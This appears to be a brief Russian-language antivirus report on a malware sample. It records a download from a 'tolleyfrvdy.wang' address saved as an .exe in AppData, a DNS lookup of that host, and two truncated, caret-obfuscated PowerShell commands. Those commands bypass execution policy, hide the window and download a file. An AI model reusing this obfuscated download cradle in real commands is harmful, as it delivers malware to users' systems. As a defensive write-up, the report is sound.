Техническая информация
- http://tolleyfrvdy.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PO^W^eRSH^eLL.EXe^ ^-exE^CUT^IO^nP^oli^Cy^ By^P^A^S^s ^-NoPRofi^le -wIN^do^wst^YlE^ h^IdDEN^ (^n^ew^-O^BjECT s^y^Ste^m.n^Et^.W^eb^ClIenT).^downLO^AdFIL^E^('http://tolleyfr...
- DNS ASK to####frvdy.wang
- '<SYSTEM32>\cmd.exe' /c "PO^W^eRSH^eLL.EXe^ ^-exE^CUT^IO^nP^oli^Cy^ By^P^A^S^s ^-NoPRofi^le -wIN^do^wst^YlE^ h^IdDEN^ (^n^ew^-O^BjECT s^y^Ste^m.n^Et^.W^eb^ClIenT).^downLO^AdFIL^E^('http://tolleyfr...' (со скрытым окном)